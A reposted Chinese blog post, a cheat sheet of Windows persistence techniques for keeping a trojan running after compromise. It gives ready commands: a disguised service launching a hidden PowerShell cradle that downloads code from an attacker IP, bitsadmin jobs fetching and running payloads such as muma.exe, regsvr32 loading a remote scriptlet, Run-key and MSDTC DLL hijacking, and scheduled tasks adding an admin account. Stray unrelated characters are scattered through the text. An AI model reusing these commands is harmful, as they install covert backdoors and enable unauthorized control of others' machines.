Windows自啟動(dòng)姿勢(shì)

轉(zhuǎn)自--http://www.ansbase5.org/?p=366

服務(wù)啟動(dòng)

使用SC命令創(chuàng)建windows服務(wù)名最好偽裝下,binpath= 這里一定要注意有個(gè)空格,不然創(chuàng)建不成功,把powershell遠(yuǎn)程執(zhí)行下載命令也包含進(jìn)去地址:http://192.168.1.82:19001/a鏈接就是我們剛剛生成的木馬地址

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX(((new-object net.webclient).downloadstring('http://192.168.1.82:19001/a'))\""

SC config "name" start= auto?//我們需要把這個(gè)name服務(wù)設(shè)置為自動(dòng)待诅。

Sc description "name" "description"?// 設(shè)置服務(wù)的描述字符串

net start "name"?// 啟動(dòng)服務(wù)

SC delete "name"?//刪除這個(gè)服務(wù)茫虽,不想使用服務(wù)直接刪除

PS:不是所有程序都可以作為服務(wù)的方式運(yùn)行,所以請(qǐng)看:http://www.x2009.net/articles/create-a-windows-service-methods.html

regedit 注冊(cè)表啟動(dòng)

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Users\Administrator\Desktop\artifact1.exe" /f//當(dāng)系統(tǒng)注銷(xiāo),再次進(jìn)入登入到目標(biāo)系統(tǒng)就會(huì)上線,權(quán)限是繼承的。

MSDTC

http://www.4hou.com/system/6890.html

簡(jiǎn)單說(shuō):在域和工作組中谷醉,MSDTC服務(wù)啟動(dòng)時(shí),會(huì)搜索注冊(cè)表Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSDTC\MTxOCI澡匪,MSDTC.exe啟動(dòng)時(shí)會(huì)加載3個(gè)dll(oci.dll,SQLLib80.dll,xa80.dll),有一個(gè)dll不是系統(tǒng)自帶的减江,我們可以把我們的dll馬子替換成其中的那個(gè)不自帶的dll的名字(oci.dll)。

net start msdtc?// 手動(dòng)啟動(dòng) msdtc

降權(quán)啟動(dòng)MSDTC.exe :msdtc -install

>PS: 滲透技巧——程序的降權(quán)啟動(dòng)?http://t.cn/RSp4h4O

啟動(dòng)項(xiàng)

C:\Users\{user}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Bitsadmin

該項(xiàng)的自啟動(dòng)是利用了schtasks來(lái)自啟動(dòng)的捻爷,必須要用戶(hù)登錄辈灼,且在登錄后2-4分鐘后才會(huì)執(zhí)行,此法貌似是有個(gè)90天的限制的?

需要權(quán)限:管理員

說(shuō)明:下方的start_test是任務(wù)名也榄,%comspec%是cmd的絕對(duì)路徑巡莹,%temp%是用戶(hù)的臨時(shí)目錄。

第一種:配合Powershell甜紫,測(cè)試成功

bitsadmin /create start_test //添加用戶(hù)名

bitsadmin /addfile start_test %comspec% %temp%\cmd.exe //添加文件降宅,此步驟是為下一步做鋪墊,

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.0.1:81/a'))\""? //第二步完成之后就啟動(dòng)這一步

bitsadmin /Resume start_test //啟動(dòng)下載任務(wù)

第二種:直接下載EXE執(zhí)行

bitsadmin /create start_test //創(chuàng)建任務(wù)

bitsadmin /addfile start_test http://www.baidu.com/muma.exe %temp%\muma.exe //添加文件囚霸,此步驟是為下一步做鋪墊腰根,

bitsadmin /SetNotifyCmdLine start_test "%COMSPEC%" "cmd.exe /c bitsadmin.exe /complete \"backdoor\" && start /B %temp%\muma.exe"? //第二步完成之后就啟動(dòng)這一步

bitsadmin /Resume start_test //啟動(dòng)下載任務(wù)

配合其他命令||我舉一,你反三

道理都是一樣的邮辽,你可以用regsvr32唠雕,也可以用其他的下載命令。

bitsadmin /create backdoor

bitsadmin /addfile backdoor %comspec%? %temp%\cmd.exe

bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"

bitsadmin /Resume backdoor

更加多的命令請(qǐng)看閱讀:windows命令執(zhí)行漏洞不會(huì)玩吨述? 看我岩睁!:https://evi1cg.me/archives/remote_exec.html?||

下載文件的15種方法 - 愛(ài)小狐貍的小螃蟹:http://www.vuln.cn/6665?||

13種方式下載文件:https://evi1cg.me/archives/13-ways-to-download-a-file.html

更多關(guān)于Bitsadmin姿勢(shì)請(qǐng)閱讀:Use bitsadmin to maintain persistence and bypass Autoruns:https://www.tuicool.com/articles/rqe63qj||

使用計(jì)劃任務(wù)和bitsadmin實(shí)現(xiàn)惡意代碼長(zhǎng)期控守:http://blog.csdn.net/qq_31481187/article/details/57540231

SchTasks

>強(qiáng)大的任務(wù)計(jì)劃功能,你值得擁有的:官方網(wǎng)站文檔:https://technet.microsoft.com/zh-cn/library/cc772785.aspx#BKMK_days

Onstart:schtasks /create /tn sch /ru system /sc onstart /tr "net user admin admin /add"? /f

Onlogin:schtasks /create /tn sch /ru system /sc onlogin /tr "net user admin admin /add"? /f

Onidle:schtasks /create /tn sch /ru system /sc onidle /i 1 /tr "net user admin admin /add"? /f

every 1 min:schtasks /create /tn sch /ru system /sc MINUTE /mo 1? /tr "net user admin admin /add" /f

every 1 day:schtasks /create /tn sch /ru system /sc daily /mo 1? /tr "net user admin admin /add"? /f

onince:schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /sd 01/01/2003 /st 00:00? /f

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末揣云,一起剝皮案震驚了整個(gè)濱河市捕儒,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌邓夕,老刑警劉巖刘莹,帶你破解...
    沈念sama閱讀 221,695評(píng)論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異焚刚,居然都是意外死亡点弯,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,569評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門(mén)矿咕,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)抢肛,“玉大人,你說(shuō)我怎么就攤上這事碳柱〖裥酰” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 168,130評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵莲镣,是天一觀的道長(zhǎng)福稳。 經(jīng)常有香客問(wèn)我,道長(zhǎng)瑞侮,這世上最難降的妖魔是什么的圆? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,648評(píng)論 1 297
  • 正文 為了忘掉前任鼓拧,我火速辦了婚禮,結(jié)果婚禮上略板,老公的妹妹穿的比我還像新娘毁枯。我一直安慰自己,他們只是感情好叮称,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,655評(píng)論 6 397
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著藐鹤,像睡著了一般瓤檐。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上娱节,一...
    開(kāi)封第一講書(shū)人閱讀 52,268評(píng)論 1 309
  • 那天挠蛉,我揣著相機(jī)與錄音,去河邊找鬼肄满。 笑死谴古,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的稠歉。 我是一名探鬼主播掰担,決...
    沈念sama閱讀 40,835評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼怒炸!你這毒婦竟也來(lái)了带饱?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,740評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤阅羹,失蹤者是張志新(化名)和其女友劉穎勺疼,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體捏鱼,經(jīng)...
    沈念sama閱讀 46,286評(píng)論 1 318
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡执庐,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,375評(píng)論 3 340
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了导梆。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片轨淌。...
    茶點(diǎn)故事閱讀 40,505評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖问潭,靈堂內(nèi)的尸體忽然破棺而出猿诸,到底是詐尸還是另有隱情,我是刑警寧澤狡忙,帶...
    沈念sama閱讀 36,185評(píng)論 5 350
  • 正文 年R本政府宣布梳虽,位于F島的核電站,受9級(jí)特大地震影響灾茁,放射性物質(zhì)發(fā)生泄漏窜觉。R本人自食惡果不足惜谷炸,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,873評(píng)論 3 333
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望禀挫。 院中可真熱鬧旬陡,春花似錦、人聲如沸语婴。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,357評(píng)論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)砰左。三九已至匿醒,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間缠导,已是汗流浹背廉羔。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,466評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留僻造,地道東北人憋他。 一個(gè)月前我還...
    沈念sama閱讀 48,921評(píng)論 3 376
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像髓削,于是被迫代替她去往敵國(guó)和親竹挡。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,515評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容

  • 一蔬螟、基礎(chǔ)語(yǔ)法: 1.批處理文件是一個(gè)“.bat”結(jié)尾的文本文件此迅,這個(gè)文件的每一行都是一條DOS命令【山恚可以使用任何文...
    蔣_Sir閱讀 9,161評(píng)論 1 4
  • 近日讀完了路遙先生的成名作《人生》耸序。 《人生》這部小說(shuō)是我讀了《平凡的世界》之后,看的路遙的第二部小說(shuō)鲁猩。一如《平凡...
    好多橙閱讀 259評(píng)論 0 2
  • 1坎怪、Promise 簡(jiǎn)介及使用 1.1、Promise 簡(jiǎn)介 Promise 對(duì)象是 CommonJS 工作組提出...
    cfighter閱讀 3,152評(píng)論 2 4
  • 3月11的89班開(kāi)班之黑金之夜璀璨驚艷廓握,歡喜搅窿,刀刀,金馬三位大咖輪流亮相隙券! 受益匪淺男应,金馬定投去年已參加,歡喜的見(jiàn)...
    zhujiang0718閱讀 243評(píng)論 0 0
  • 天國(guó)的海子 您好 也許你不知道現(xiàn)在你愛(ài)的人怎樣 但愛(ài)你的人還在思念 不知道你的詩(shī)影響多少人 他們?cè)谀脑?shī)里尋找一個(gè)...
    人文澤閱讀 160評(píng)論 0 3